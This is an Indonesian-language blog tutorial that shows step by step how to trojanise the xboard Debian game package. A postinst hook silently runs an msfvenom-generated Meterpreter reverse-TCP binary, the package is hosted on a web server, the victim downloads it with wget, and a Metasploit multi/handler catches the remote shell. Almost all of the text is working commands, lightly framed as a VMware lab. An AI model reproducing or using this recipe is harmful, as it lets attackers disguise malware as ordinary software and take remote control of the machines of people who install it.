How to Hack Linux Using Metasploit !

Oke kali ini kita akan membahas kembali mengenai Metasploit. Sebelumnya kita sudah membahas payload PHP yang bisa digunakan untuk meretas sistem linux, kali ini akan sedikit berbeda. Oke langsung saja kita mulai.

A. Pengertian
Mungkin dari beberapa pembaca disini sudah mengetahui apa itu metasploit,

B. Latar Belakang
Banyak orang bilang bahwa linux itu aman dari virus, saya sendiri awalnya juga menganggap seperti itu,disini saya akan sedikit berbagi mengenai How to hack linux using Metasploit !.

C. Tahap Pelaksanaan

  1. Sebelum mengikuti tutorial sebaiknya anda memakai os Linux (Direkomendasikan Memakai Os Pentest seperti Backbox,Kali Linux,dll)
  2. Disini saya memanfaatkan VMware sebagai tumbalnya
  3. Tentunya ada koneksi internet yang nanti untuk mendownload sebuah Package
  4. Buka terminal anda dan masukin perintah seperti dibawah ini

    [email protected]:~# apt-get –download-only install xboard

  5. Setelah itu buatlah sebuah folder di tmp dengan memasukan perintah seperti dibawah ini

    [email protected]:~# mkdir /tmp/linuxsec

  6. Lalu pindahkan package xboard ke folder yang baru saja tadi dibuat, seperti dibawah ini

    [email protected]:~# mv /var/cache/apt/archives/xboard_4.7.3-1_amd64.deb /tmp/linuxsec

  7. Setelah itu masuk ke folder yang baru saja di buat,masukan perintah seperti ini

    [email protected]:/tmp/linuxsec# dpkg -x xboard_4.7.3-1_amd64.deb gamerat
    [email protected]:/tmp/linuxsec# mkdir gamerat/DEBIAN

  8. Masuk ke folder DEBIAN lalu buat file “control” dan isilah file tersebut seperti dibawah ini

    Package: Xboard
    Version: 1.0.0
    Section: Games and Amusement
    Priority: optional
    Architecture: i386
    Maintainer: Ubuntu MOTU Developers ([email protected])
    Description: Mohon Bersabar Ini Ujian

    note : Description bisa anda ubah
     

  9. Kalau sudah buatlah file lagi yaitu “postinst”, dan isi filenya seperti dibawah ini

    #!bin/sh
    sudo chmod 2755 /usr/games/xboard_nilai && /usr/games/xboard_nilai & /usr/games/xboard &

  10. Setelah itu kita buat payloadnya,masukan perintah seperti dibawah ini

    [email protected]:~# msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.117.1 LPORT=1337 -b “x00” -f elf -o /tmp/linuxsec/gamerat/usr/games/xboard_nilai

    note : ubah path yang saya kasih warna merah dengan path anda, dan ubah ip sama port yang saya kasih warna hijau sesuai konfigurasi awal anda

  11. Setelah itu kasih hak akses dan build package tersebut, dengan memasukan perintah seperti dibawah ini

    [email protected]:~# cd /tmp/linuxsec/gamerat/DEBIAN
    [email protected]:/tmp/linuxsec/gamerat/DEBIAN# chmod 755 postinst
    [email protected]:/tmp/linuxsec/gamerat/DEBIAN# cd /tmp/linuxsec/
    [email protected]:/tmp/linuxsec/# dpkg-deb –build gamerat 

  12. Setelah itu copy trojannya taruh di /var/www atau /var/www/html
  13. Trojan kita sudah jadi sekarang anda eksekusi filenya di VMware Dan Meremotenya,,caranya gimana ?
  14. Installah terlebih dahulu gufw < pengertian dan cara penggunaan anda bisa cari di google
  15. Lalu buka Terminal anda ketikan perintah seperti dibawah ini

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 172.16.117.1
    lhost => 172.16.117.1
    msf exploit(handler) > set lport 1337
    lport => 1337
    msf exploit(handler) > exploit

  16. Setelah itu di OS Guest(Os linux yang dijadikan tumbal ,sudah terinstall di vmware)
  17. Masuk ke OS Guest Guset tersbut dan download file anda, dengan memasukan perintah seperti berikut

    wget http://172.16.117.1/gamerat.deb

  18. Masih di Os Guest > eksekusi filenya dengan memamuskan perintah

    [email protected]:/home/guestos# chmod +x gamerat.deb
    [email protected]:/home/guestos# dpkg -i gamerat.deb

  19. Lihat apa yang terjadi di metasploit console anda di Os Host

Kalu muncul seperti gambar dibawah ini berarti anda sukses mengikuti tutorial seperti diatas

Kalau anda masih belum paham dengan tutorial diatas anda bisa melihat video di bawah ini


Shares

3 Comments

Leave a Reply